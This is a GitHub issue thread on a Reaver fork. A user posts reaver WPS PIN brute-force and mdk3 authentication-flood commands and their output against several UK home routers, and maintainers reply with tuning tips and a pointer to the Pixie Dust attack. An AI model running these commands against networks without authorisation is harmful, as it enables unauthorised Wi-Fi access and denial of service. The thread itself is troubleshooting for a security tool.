t6x/reaver-wps-fork-t6x #249: USING REAVER IN UK ROUTERS 90% OF PROGRESS THEN STOPS

FakuVe, 2018-06-25:
Hi there,

I've been trying to make use of the current wifi audition techniques in regards of Router Password 
retrieval.

GEAR:

I've been through car boot sales and adquired some of the current routers on the market.
I've been using a Raspberry Pi Model 3B+ with Kali Linux Installed with 

Wireless Card: Alfa AWUSO36NH Driver:rt2800usb	Chipset:Ralink Technology, Corp. RT2870/RT3070

As We know already there is no longer more WEP routers being sold, so the only exploitability the system has as I've been reading , apart of capturing the handshake and bruteforcing it (which will take me good weeks with a good computer or paying for a server to do it for me which I dont want), so I wanted to try with the WPS technique reaver.
I'm not really familiarised with the concepts of this program, but I've tried to be cautious on setting it up, and as much as I know sometimes WPS feature get blocked when attemping too many PINS in a short period of time so I made use of the script ReVdK3-r3.sh which combines the power of Reaver with Mdk3 to reset automaticaly the router once it get blocked.

PROGRAMS USED:

Reaver v1.6.5 WiFi Protected Setup Attack Tool
mdk3 Installed: 6.0-4

Being cautious I setted -d 5 and -t 5 which is the parameters what the script let you pretty much tweak, sometimes I would set them even 10 both.

So I ended up with this inputs

(I will codify some of the MAC and ESSID with the wildcards in hashcat)
(assuming that -1 ?d?A?B?C?D?E?F (HEXADECIMAL))
( ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ)
( ?d = 0123456789 )

wash -i wlan0

00:F2:01:3C:?1?1:?1?1   11  -79  1.0  No             BTHub3-?u?u?u?d
F8:1A:67:78:?1?1:?1?1    1  -69  1.0  No   RealtekS  TP-LINK_?d?d?d?u?d?d
20:A6:80:D2:?1?1:?1?1    6  -73  2.0  No   RealtekS  TALKTALK?u?d?u?d?d?u
60:38:E0:D4:?1?1:?1?1    6  -79  2.0  No   RealtekS  virginmedia?d?d?d?d?d?d?d

Using Reaver

reaver -i mon1 -b 00:F2:01:3C:?1?1:?1?1 -S -c 11 -d 5 -t 5 -l 10 -N -vv

Using mdk3 Dos Flood Attack

mdk3 mon1 a -a 00:F2:01:3C:?1?1:?1?1 -s 200 & mdk3 mon2 a -a 00:F2:01:3C:?1?1:?1?1 -s 200 & mdk3 mon3 a -a 00:F2:01:3C:?1?1:?1?1 -s 200

Then I get the following outputs (For the different routers)

00:F2:01:3C:?1?1:?1?1   11  -79  1.0  No             BTHub3-?u?u?u?d

After tried some PINs it get stuck at this point

[+] Trying pin "16585676"
[+] Associated with 00:F2:01:3C:?1?1:?1?1 (ESSID: BTHub3-?u?u?u?d)
[+] 15.15% complete @ 2018-06-16 05:55:31 (0 seconds/pin)
[+] Trying pin "16585676"

F8:1A:67:78:?1?1:?1?1    1  -69  1.0  No   RealtekS  TP-LINK_?d?d?d?u?d?d

After having tried PINS for entire days it stopped in 99985677 and it doesnt go any further than thatone

[+] Trying pin "99985677"
[!] Found packet with bad FCS, skipping...
[+] Associated with F8:1A:67:78:?1?1:?1?1 (ESSID: TP-LINK_?d?d?d?u?d?d)
[+] 90.90% complete @ 2018-06-16 06:51:05 (0 seconds/pin)
[!] WARNING: 25 successive start failures

20:A6:80:D2:?1?1:?1?1    6  -73  2.0  No   RealtekS  TALKTALK?u?d?u?d?d?u

[!] Found packet with bad FCS, skipping...
[+] Trying pin "99985677"
[+] Associated with 20:A6:80:D2:?1?1:?1?1 (ESSID: TALKTALK?u?d?u?d?d?u)
[+] 90.90% complete @ 2018-06-16 06:57:46 (0 seconds/pin)

Gets stuck in the same percentaje as the previous one

60:38:E0:D4:?1?1:?1?1    6  -79  2.0  No   RealtekS  virginmedia?d?d?d?d?d?d?d

[+] Restored previous session
[+] Waiting for beacon from 60:38:E0:D4:?1?1:?1?1
[!] Found packet with bad FCS, skipping...
[+] Received beacon from 60:38:E0:D4:?1?1:?1?1
[+] Vendor: RealtekS
[+] Trying pin "88885674"
[+] Associated with 60:38:E0:D4:?1?1:?1?1 (ESSID: virginmedia?d?d?d?d?d?d?d)

Gets stuck as well in this PIN.

---

I reckon in the ones who reached 90% of the process the router may had tricked reaver as if it was trying PINs but its suspicious to have to always reach 90% of the process it was definitely loosing my time.

Is there any workaround you reckon? How is the troubleshooting in this cases?
I have the session files in case you want them.

I have tried with lots of different routers but thoseones they just dont start so I'm not even bothered to post thoseones out (I don't even have saved the session)
Is there any guide to understand thoroughly the parameters of Reaver.
Btw I tried to use Bully but thatone wont even try a single PIN.

Is it finally this WPS vulnerability being fixed by router companies? If so why it doesnt even work in 10 years old routers (like BTHub3) was the router firmware been updated by some process?

If this exploit was fixed, is that means that the only flaw there is now is capturing handshake and bruteforcing it?

Best Regards community,

rofl0r, 2018-06-25:
TL;DR

1) you need -N with ralink adapter
2) it's stupid and almost impossible to bruteforce a pin
3) if you don't know the default pin or don't have a pingenerator there's not much sense using reaver

if you have a specific question (after following above advice) please formulate it short and precise, nobody of the team has time to read a book

FakuVe, 2018-06-27:
Thank you vert much for your help.

First of all sorry for the biblic question but I wanted to specify it properly just in case someone wanted to dig depper into it but I understand you are not here to make a full customer support.

Im checking in your points above and will post you or cloae the topic when I better diagnose the situation.

Thanks very much to you and your team , you are encouraging me to get deeper into it even would be able to help you should I learn the skills needed.

If you have any usefull documentation with thoroughly explained the reaver commands and how to use them (little bit further than reaver --help) please let me know.

BR

kcdtv, 2018-06-28:
I don't mind the quantity of text...  but please,  for the next time, use the option to insert code blocks.  :smiley_cat: 
The wifi chip from the PAs you show are made by realtek, you might be interested in reading this: 
>>>
* More information about the Pixie Dust attack (including **which APs are vulnerable**) can be found in [pixiewps repository](https://github.com/wiire/pixiewps), 
[pixie dust thread (in Kali forum)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)) & [Dominique Bongard's full disclosure](https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?usp=sharing)
>>>
Your questions are a bit off-topic in this repository which focus on code related questions. And to debugg an eventual code issue we would need you to have full access to the router in order to control the configuration and to know the WPS PIN in use.

FakuVe, 2018-07-04:
Yeah I know but I haven't seen a better place to post this doubt.
I will take a look to all the info and I will let you know.
Once again, I'm just getting initiated also on operating in Forums and stuff so I know everything is so n00b coming to me but hoping one day I can become one of you solving other n00bs questions haha.

Much appreciate it.

jalfraag, 2018-07-14:
FakuVe the BT3 wasn't vulnerable to reaver brute force in the first place. It must be PBC as it doesn't work even if you have the pin and use -p XXXXXXXX

closed 2018-07-28 by kcdtv